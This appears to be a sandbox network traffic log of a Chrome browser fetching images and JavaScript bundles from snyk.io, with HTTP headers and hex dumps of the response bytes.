                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="hero-homepage-2024.jpg"
                                                                                                                                                                                                                                                                                                              Content-Length: 18687
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'none'; frame-src 'none'; sandbox;
                                                                                                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 07 Aug 2024 17:06:39 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::gmw6j-1729799336947-3625c21b8fce
                                                                                                                                                                                                                                                                                                              X-Vercel-Imgsrc: f54bd4917a1ece816b793e593d7dcfa5
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:56 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799336.1090bcb
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC3320INData Raw: ff d8 ff db 00 43 00 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff db 00 43 01 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff c2 00 11 08 03 4f 05 a7 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 ff c4 00 1c 01 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fc 54 7f 48 f0 d1 a0 b6 2c 56 f5 c7 b6 39 79 78 39 18 ed 76 fa 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: C++&.%#%.&D5//5DNB>BN_UU_wqwC++&.%#%.&D5//5DNB>BN_UU_wqwO"TH,V9yx9v=
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC15367INData Raw: ab 4a dd d6 57 5b b8 ad ee e2 b7 bb 84 d7 25 e3 b3 7b b8 4b ca c2 6b 92 f1 a6 b9 2f 16 b3 ad de 34 bc 8e 36 5c 8c 25 db 0c b7 98 92 2b 18 cb 48 e9 ea 5c fe 73 5a 9a de 1b cd d6 75 ac eb 59 d6 b3 ad 62 ea 5b 8b bc db 9b a9 59 b6 5b 2a 69 02 4a 12 c2 08 80 95 09 73 2c 95 9b 26 a4 b1 ac cb 96 e4 b2 6a 66 c9 73 2c 6f 32 c9 a9 9d 66 6a 4b 9c ea 4b 26 a4 b3 3a 92 e6 54 b9 94 4c d4 b1 44 cd b0 84 a5 8b 20 32 05 08 8a 88 20 b2 50 00 00 00 02 82 d0 a1 6c 94 d8 34 0a 0d 2a 5d 40 d0 34 59 74 0d 40 d5 0a 0d 40 a1 68 34 94 b2 2a a5 96 82 95 68 56 94 69 4b ab 65 69 55 b5 59 a5 95 a5 59 a5 56 85 9a 55 9b 96 b3 4a 9a 16 59 6a 58 5c a2 b2 8a 92 35 32 ca a4 e9 d9 ae 7f 9a d6 b3 ad 63 56 5d e6 ef 3a de 35 73 bb 8b ac dd 67 56 5b 9d 5c e9 9b 62 cd 25 4a 96 45 82 a2 12 84 25
                                                                                                                                                                                                                                                                                                              Data Ascii: JW[%{Kk/46\%+H\sZuYb[Y[*iJs,&jfs,o2fjKK&:TLD 2 Pl4*]@4Yt@@h4*hViKeiUYYVUJYjX\52cV]:5sgV[\b%JE%


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              11192.168.2.54973323.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC458OUTGET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&w=960&q=75 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC717INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="feature-snyk-snowflake.jpg"
                                                                                                                                                                                                                                                                                                              Content-Length: 20358
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'none'; frame-src 'none'; sandbox;
                                                                                                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 04 Jun 2024 00:44:27 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::zmjdb-1729799336920-4cc599ada474
                                                                                                                                                                                                                                                                                                              X-Vercel-Imgsrc: d99801196f2474998946528806e55977
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:57 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799336.1090ba7
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC3319INData Raw: ff d8 ff db 00 43 00 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff db 00 43 01 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff c2 00 11 08 01 f6 03 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 07 08 ff c4 00 1a 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f8 c4 17 af ec 34 13 74 53 45 51 04 36 83 74 d4 d0 e8 82 29 a0 9d 51 4d
                                                                                                                                                                                                                                                                                                              Data Ascii: C++&.%#%.&D5//5DNB>BN_UU_wqwC++&.%#%.&D5//5DNB>BN_UU_wqw"4tSEQ6t)QM
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC16384INData Raw: 37 37 5f 3a c7 eb 7d 3f ce 7f 50 9d 79 de 3d fd 5c 78 cb c7 89 d6 d6 32 b6 f4 ca c7 89 d6 66 60 f3 33 03 33 30 33 33 03 33 30 33 7a 84 73 fc ff 00 cc e3 8f 27 75 34 7a 6d e9 bb db d3 2b 6f 4d d6 de 99 58 f1 95 8f 1b bc 78 8a db d3 2b 6b 1b ad ac 65 67 17 a1 c1 1c bf 31 9b c3 98 97 a0 99 a0 14 cd 02 99 9a 02 40 a1 14 c5 0a 99 8a 12 66 68 09 99 a0 4a 66 80 80 59 14 cb 2a 66 59 26 66 80 40 50 a9 99 a0 26 66 84 9d 20 81 b9 a2 a8 82 1b 41 3a a6 c2 1d 10 45 34 11 4d 06 db 53 65 34 11 4d cd 37 45 36 53 41 14 f0 ec 78 1e 85 08 75 48 8e 25 48 2c 3f 49 ed fc 8b dd 9d fe f1 fc ff 00 55 f6 7b 2f c4 d8 fd d7 e0 a2 bd f7 f3 f4 75 ef 67 83 83 f7 b3 c2 db 3d cc f1 30 7e de 78 db 0f 63 3c 8c 0f 5e bf 39 e1 99 fd d7 e6 be d7 89 9f 16 de 52 f5 db d7 ac 57 9a fb 26 54 9e 9b
                                                                                                                                                                                                                                                                                                              Data Ascii: 77_:}?Py=\x2f`33033303zs'u4zm+oMXx+keg1@fhJfY*fY&f@P&f A:E4MSe4M7E6SAxuH%H,?IU{/ug=0~xc<^9RW&T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC655INData Raw: c1 ed cb c5 fd 2b 67 25 c9 8c 60 d7 e1 a2 84 5a 44 2e a9 03 e4 c5 b5 52 d1 c8 90 c3 ed d7 61 e7 e1 5e 8f e4 c3 de 08 77 2b 4d 35 4e 73 d9 8e ae 3a 71 61 a6 c4 e7 3e 3a 7b 64 d4 69 27 ab 4a 2e 73 0d 03 cb a8 31 14 c9 8c 8f 0d 1a 34 d7 bd bb d0 ac 6c 61 06 b4 2f d2 54 e4 b2 8d e5 0b 81 69 24 77 10 8c b2 9a 6d 04 ba 85 a2 95 6f 8e f5 03 9e 43 c3 ba 8d 06 90 4f de 8a d9 b6 1e 33 f8 d4 9b ce ac 6b a8 a8 a8 88 40 1d ca 87 72 08 05 4b 98 3f 72 5e 3f e9 39 a4 b4 d0 02 7a aa a5 8a 66 c9 0b e5 7d 5c e7 29 22 7c 96 c9 03 1d 85 c0 54 28 1b 20 60 32 53 1f 59 08 46 ca 93 84 54 ac 20 ed 09 b1 b1 a2 81 a0 77 04 1a 05 28 02 0d 6e 8d 08 43 10 d8 c6 8f b2 2c 63 ab 56 83 54 d6 b5 a2 8d 00 05 6b db 07 11 fc 6a 8e a0 f4 5d 2e 24 03 40 10 6f fb 39 61 ff 00 67 2c 27 e6 28 69 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: +g%`ZD.Ra^w+M5Ns:qa>:{di'J.s14la/Ti$wmoCO3k@rK?r^?9zf}\)"|T( `2SYFT w(nC,cVTkj].$@o9ag,'(io


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              12192.168.2.54973023.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC516OUTGET /_next/static/chunks/2614.3ec078ba5dda1b72.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="2614.3ec078ba5dda1b72.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"063426302167d73bd81249302550a93b"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:51 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/2614.3ec078ba5dda1b72.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::qjmb2-1729257050848-97f1aad9bfc9
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:56 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 3501
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799336.1f60077
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC3501INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 36 31 34 5d 2c 7b 35 36 39 38 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 65 2c 69 29 7b 69 2e 64 28 65 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6e 3d 69 28 38 35 38 39 33 29 2c 72 3d 69 28 36 37 32 39 34 29 2c 61 3d 69 28 34 35 36 39 37 29 2c 73 3d 69 2e 6e 28 61 29 2c 6f 3d 69 28 34 30 30 37 30 29 2c 64 3d 69 28 34 34 31 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 74 28 6c 29 7b 6c 65 74 20 65 3b 6c 65 74 7b 6c 6f 67 6f 73 3a 69 2c 68 65 61 64 6c 69 6e 65 3a 61 2c 69 73 43 6c 75 73 74 65 72 3a 73 2c 69 73
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2614],{5698:function(l,e,i){i.d(e,{Z:function(){return u}});var n=i(85893),r=i(67294),a=i(45697),s=i.n(a),o=i(40070),d=i(44133);function t(l){let e;let{logos:i,headline:a,isCluster:s,is


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              13192.168.2.54973223.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC516OUTGET /_next/static/chunks/2165.946eebc4630896bc.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC733INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="2165.946eebc4630896bc.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"59370e3451c4718a1194e07e3f4f3947"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/2165.946eebc4630896bc.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::dpkcb-1729257050687-e72c924de1ac
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:56 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 13465
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799336.1f6007c
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC13465INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 31 36 35 5d 2c 7b 38 32 34 31 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6c 2c 6f 29 7b 6f 2e 64 28 6c 2c 7b 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 78 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 7d 29 3b 6c 65 74 20 65 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 6c 65 74 20 6c 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 35 2c 6f 3d 31 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 69
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2165],{8241:function(i,l,o){o.d(l,{d:function(){return n},x:function(){return e}});let e=function(i){let l=arguments.length>1&&void 0!==arguments[1]?arguments[1]:5,o=1;switch(!0){case i


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              14192.168.2.54972723.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:56 UTC516OUTGET /_next/static/chunks/1751.f8f467cbaf47e698.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="1751.f8f467cbaf47e698.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"10a12f623813aabd1075d8a47b163938"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/1751.f8f467cbaf47e698.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::8wnvv-1729257050687-243d699c8870
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:56 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 5358
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799336.1f60087
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC5358INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 37 35 31 5d 2c 7b 38 31 37 35 31 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6c 2c 6f 29 7b 6f 2e 72 28 6c 29 2c 6f 2e 64 28 6c 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 7d 7d 29 3b 76 61 72 20 64 3d 6f 28 38 35 38 39 33 29 2c 6e 3d 6f 28 34 35 36 39 37 29 2c 65 3d 6f 2e 6e 28 6e 29 2c 76 3d 6f 28 39 36 30 39 38 29 2c 74 3d 6f 28 31 35 30 32 30 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 69 29 7b 6c 65 74 7b 73 65 63 74 69 6f 6e 3a 6c 2c 63 6f 6c 6f 72 53 63 68 65 6d 65 3a 6f 2c 63 68 69 6c 64 72 65 6e 3a 6e 3d 5b
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1751],{81751:function(i,l,o){o.r(l),o.d(l,{default:function(){return I}});var d=o(85893),n=o(45697),e=o.n(n),v=o(96098),t=o(15020);function u(i){let{section:l,colorScheme:o,children:n=[


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              15192.168.2.54972623.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC453OUTGET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1727870043%2Ffeature-code-rise.png&w=960&q=75 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="feature-code-rise.png"
                                                                                                                                                                                                                                                                                                              Content-Length: 102868
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: script-src 'none'; frame-src 'none'; sandbox;
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 02 Oct 2024 11:54:13 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::qnzbd-1729799337346-3eee8d83e689
                                                                                                                                                                                                                                                                                                              X-Vercel-Imgsrc: 5bb68f6ef9bde975354918337bcba79f
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:57 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799337.1090dc5
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC3323INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 c0 00 00 01 f6 08 03 00 00 00 88 b4 15 30 00 00 00 f3 50 4c 54 45 03 0f 61 05 18 81 02 06 3e 03 0e 5a 04 16 7a 01 08 67 01 06 56 01 08 5e 04 13 72 04 11 6a 05 1c 93 01 42 ef 05 19 87 00 02 45 04 1c b6 02 0e 80 05 1b 8d 01 04 4d 02 0c 78 03 1e be 01 09 70 03 0b 51 02 10 88 02 17 9f 01 40 e7 03 1a ae 4c d7 b5 05 1e 98 01 3d df 03 26 cf 02 18 a6 02 3a d7 02 14 98 03 20 c8 05 21 a2 03 0b 47 03 37 d0 01 11 90 04 25 a8 01 3f f7 03 34 c7 02 05 34 02 2a d8 04 28 af 04 27 b7 03 31 be 04 25 c2 02 2e e0 a3 ea d9 e7 fa f5 04 22 9d dc f7 f1 02 35 e6 01 35 ef 12 4b df 3b 51 db f5 fd fb 2c 51 d0 12 3f bb 13 42 d1 5d da bc 99 e8 d5 28 55 da 6d de c3 7c e1 c9 cc f3 ea 8b e5 cf b0 ed de be f0 e4 12 3e c6 24 53 c5 0d
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDR0PLTEa>ZzgV^rjBEMxpQ@L=&: !G7%?44*('1%."55K;Q,Q?B](Um|>$S
